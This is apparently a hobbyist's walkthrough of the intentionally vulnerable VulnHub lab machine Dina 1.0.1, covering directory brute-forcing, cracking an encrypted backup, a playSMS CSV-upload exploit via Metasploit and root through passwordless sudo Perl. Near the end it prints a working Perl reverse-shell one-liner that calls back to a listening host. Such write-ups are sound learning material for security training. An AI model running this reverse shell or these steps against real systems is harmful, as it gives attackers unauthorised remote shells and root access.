Dina 1.0.1 Walkthrough
Dina is a fun easy vulnerable machine, it can be found at VulnHub. In total I quite enjoyed this box and would definitely recommend it to anyone who is learning, as I am.
Initial Recon
As I mentioned in a previous guide I typically use arp-scan to find the machine. Starting off I run nmap on the target, nothing interesting comes up except an Apache server running on port 80. Taking a look on Firefox we find the site that is running.
Looking in the source code of the html page we find that the “Submit Query” button sends a post request to /ange1, however it seems that the actual method attribute on the form is misspelled.
I go ahead and do a curl POST request with an empty body to /ange1 and only get the contents of an empty webpage directory.
Oh well seems to be a dead-end. My next standard step is go ahead and throw dirb at it with a few wordlists. Using the directory-list-2.3-small.txt found in the dirbuster wordlist directory we get a few interesting results back.
Taking a look into /uploads, and /tmp we find that there is nothing but empty directories. However going into /secure we find an interesting file we can download called backup.zip.
I download it and we will return to it later. Then I take a look into /nothing and get greeted with a cheeky webpage. However checking out /nothing/pass we get some potential passwords!
Local Work
Attempting to unzip backup.zip ends up failing. Appears that the archive is password encrypted. I use 7z e backup.zip we get a password prompt. Using the previously found password list from /nothing/pass we will attempt to crack it. On first try looks like the password “freedom” did the trick.
Trying to open the .mp3 file we find out that something very wrong with the file. I cat out the file and it looks to be a text file rename to .mp3.
This file now reveals to us a new URL to investigate and a potential user/pass login for something.
Getting a Shell
Heading over to /SecreTSMSgatwayLogin we seem to find a playSMS service running.
The backup-cred.mp3 file seems to indicate the password is 6 characters long, but before we try to crazy brute-forcing let us try some of those other passwords I found earlier. Trying them out sequentially we quickly find “diana” logs me in.
I trudge around here for a while, noting that I could potentially inject html into the source code (XSS?), but nothing seems to work. Then I decide to take a peek at MetaSploit and see if there is any vulnerabilities associated with playSMS.
Looks like we got some hits. During my poking around earlier I noted there was some ability to upload CSVs, so let us try the upload CSV attack.
Ran the exploit and we get greeted with a shell.
Side note: This is a meterpreter shell. Do get into a normal shell I used the following sequence of commands.
meterpreter > shell
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@Dina:/var/www$ export TERM=xtermPrivilege Escalation
I at first thought maybe the older kernel version would be vulnerable. But nothing really worked. Afterwards I followed a checklist and said to run sudo -l and see if there is anything you can run without the password.
Interesting I can run Perl scripts as sudo without a password. Doing some investigation online I find the following Perl script for a reverse shell.
perl -e 'use Socket;$i="192.168.1.167";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'Changing the IP and port in the above script. I set up Netcat in my local terminal and ran the script on the user shell, and we get root!
